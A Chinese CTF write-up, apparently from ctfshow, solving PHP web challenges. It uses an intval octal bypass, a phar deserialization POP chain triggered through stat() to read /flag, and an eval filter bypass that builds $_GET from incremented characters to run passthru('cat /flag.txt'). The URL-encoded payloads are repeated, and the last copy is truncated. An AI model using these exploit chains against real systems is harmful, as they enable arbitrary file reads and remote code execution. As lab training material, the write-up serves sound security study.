文章目录
- 热身
- ATTup
- 代码审计
- phar反序列化
- shellme
- shellme_Revenge
热身
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-18 16:53:59
# @link: https://ctfer.com
*/
include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
$num = $_GET['num'];
if($num==4476){
die("no no no!");
}
if(preg_match("/[a-z]|\./i", $num)){
die("no no no!!");
}
if(!strpos($num, "0")){
die("no no no!!!");
}
if(intval($num,0)===4476){
echo $flag;
}
}
查官方文档
intval() 函数用于获取变量的整数值。
intval() 函数通过使用指定的进制 base 转换(默认是十进制),返回变量 var 的 integer 数值。 intval() 不能用于 object,否则会产生 E_NOTICE 错误并返回 1。
PHP 4, PHP 5, PHP 7
语法
int intval ( mixed $var [, int $base = 10 ] )
参数说明:
$var:要转换成 integer 的数量值。
$base:转化所使用的进制。
如果 base 是 0,通过检测 var 的格式来决定使用的进制:
如果字符串包括了 "0x" (或 "0X") 的前缀,使用 16 进制 (hex);否则,
如果字符串以 "0" 开始,使用 8 进制(octal);否则,
将使用 10 进制 (decimal)。
?num=+010574
ATTup
查看前端源码查到php文件
upload.php find.php
任意文件读取漏洞,读取find.php
<!--class View {
public $fn;
public function __invoke(){
$text = base64_encode(file_get_contents($this->fn));
echo "<script>alert('".$text."');self.location=document.referrer;</script>";
}
}
class Fun{
public $fun = ":)";
public function __toString(){
$fuc = $this->fun;
$fuc();
return "<script>alert('Be a happy string~');self.location=document.referrer;</script>";
}
public function __destruct()
{
echo "<script>alert('Just a fun ".$this->fun."');self.location=document.referrer;</script>";
}
}
$filename = $_POST["file"];
$stat = @stat($filename);-->
代码审计
stat
stat
(PHP 4, PHP 5, PHP 7, PHP 8)
stat — 给出文件的信息
这里可以触发phar反序列化
phar反序列化
<?php
class View {
public $fn;
public function __invoke(){
// $text = base64_encode(file_get_contents($this->fn));
// echo "<script>alert('".$text."');self.location=document.referrer;</script>";
}
}
class Fun{
public $fun = ":)";
public function __toString(){
$fuc = $this->fun;
$fuc();
return "1";
// return "<script>alert('Be a happy string~');self.location=document.referrer;</script>";
}
public function __destruct()
{
// echo "<script>alert('Just a fun ".$this->fun."');self.location=document.referrer;</script>";
}
}
$a=new Fun();
$a->fun=new Fun();
$a->fun->fun=new View();
$a->fun->fun->fn="/flag";
@unlink("phar.phar");
$phar = new Phar("c2.phar");
$phar->startBuffering();
$phar->setStub('GIF89a'.' __HALT_COMPILER();'); //设置stub
$phar->setMetadata($a); //将自定义meta-data存入manifest
$phar->addFromString("test.txt", "test"); //添加要压缩的文件
//签名自动计算
$phar->stopBuffering();
直接修改后缀为tar
$phar->setStub这行的内容不能出现<?与php,否则会提示内容非法stub的基本结构:
,stub必须以__HALT_COMPILER();`来作为结束部分,否则Phar拓展将不会识别该文件。
然后以phar://c2.tar协议访问即可
alert('Y3Rmc2hvd3szOWFmNDIzMi04MTQ2LTRiMzQtOGUwZS1lYmFiMGExZjY5N2R9Cg==');
解码得到flag
shellme
直接搜索flag得到flag,非预期解?
shellme_Revenge
尝试搜索ctfhsow,flag,ctf,hint等关键词,查看cookie等信息
Set-Cookie hint=%3Flooklook; expires=Sat, 20-May-2023 04:56:12 GMT; Max-Age=3600
PHP Version 7.2.34
?looklook=1
<?php
error_reporting(0);
if ($_GET['looklook']){
highlight_file(__FILE__);
}else{
setcookie("hint", "?looklook", time()+3600);
}
if (isset($_POST['ctf_show'])) {
$ctfshow = $_POST['ctf_show'];
if (is_string($ctfshow) || strlen($ctfshow) <= 107) {
if (!preg_match("/[!@#%^&*:'\"|`a-zA-BD-Z~\\\\]|[4-9]/",$ctfshow)){
eval($ctfshow);
}else{
echo("fucccc hacker!!");
}
}
} else {
phpinfo();
}
?>
生成ascii对应可见字符
with open("ascii.txt","w") as f:
for i in range(31,128):
f.writelines(chr(i)+"\n")
查看通过正则的内容
<?php
$myfile = fopen("ascii.txt", "r") or die("Unable to open file!");
while (!feof($myfile)) {
$ctfshow=fgets($myfile);
if (is_string($ctfshow) || strlen($ctfshow) <= 107) {
if (!preg_match("/[!@#%^&*:'\"|`a-zA-BD-Z~\\\\]|[4-9]/", $ctfshow)) {
echo "$ctfshow";
}
}
}
fclose($myfile);
第一行是空格
$
(
)
+
,
-
.
/
0
1
2
3
;
<
=
?
C
[
]
_
{
}
这里尝试通过++和c构造任意字符执行命令
在PHP中,如果强制连接数组和字符串的话,数组将被转换成字符串,其值为
Array
<?php
$_=C;
$_++; //D
$C=++$_; //E
$_++; //F
$C_=++$_; //G
$_=(C/C.C)[0]; //N
$_++; //O
$_++; //P
$_++; //Q
$_++; //R
$_++; //S
$_=_.$C_.$C.++$_; //_GET
$$_[1]($$_[2]); //$_GET[1]($_GET[2])
?>
ctf_show=$_=C;$_++;$C=++$_;$_++;$C_=++$_;$_=(C/C.C)[0];$_++;$_++;$_++;$_++;$_++;$_=_.$C_.$C.++$_;$$_[1]($$_[2]);
ctf_show=%24%5f%3d%43%3b%24%5f%2b%2b%3b%24%43%3d%2b%2b%24%5f%3b%24%5f%2b%2b%3b%24%43%5f%3d%2b%2b%24%5f%3b%24%5f%3d%28%43%2f%43%2e%43%29%5b%30%5d%3b%24%5f%2b%2b%3b%24%5f%2b%2b%3b%24%5f%2b%2b%3b%24%5f%2b%2b%3b%24%5f%2b%2b%3b%24%5f%3d%5f%2e%24%43%5f%2e%24%43%2e%2b%2b%24%5f%3b%24%24%5f%5b%31%5d%28%24%24%5f%5b%32%5d%29%3b
?1=passthru&2=cat /flag.txt
ctf_show=%24%5f%3d%43%3b%24%5f%2b%2b%3b%24%43%3d%2b%2b%24%5f%3b%24%5f%2b%2b%3b%24%43%5f%3d%2b%2b%24%5f%3b%24%5f%3d%28%43%2f%43%2e%43%29%5b%30%5d%3b%24%5f%2b%2b%3b%24%5f%2b%2b%3b%24%5f%2b%2b%3b%24%5f%2b%2b%3b%24%5f%2b%2b%3b%24%5f%3d%5f%2e%24%43%5f%2e%24%43%2e%2b%2b%24%5f%3b%24%24%5f%5b%31%5d%28%24%24%5f%5b%32%5d%29%3b
%3b%24%43%3d%2b%2b%24%5f%3b%24%5f%2b%2b%3b%24%43%5f%3d%2b%2b%24%5f%3b%24%5f%3d%28%43%2f%43%2e%43%29%5b%30%5d%3b%24%5f%2b%2b%3b%24%5f%2b%2b%3b%24%5f%2b%2b%3b%24%5f%2b%2b%3b%24%5f%2b%2b%3b%24%5f%3d%5f%2e%24%43%5f%2e%24%43%2e%2b%2b%24%5f%3b%24%24%5f%5b%31%5d%28%24%24%5f%5b%32%5d%29%3b
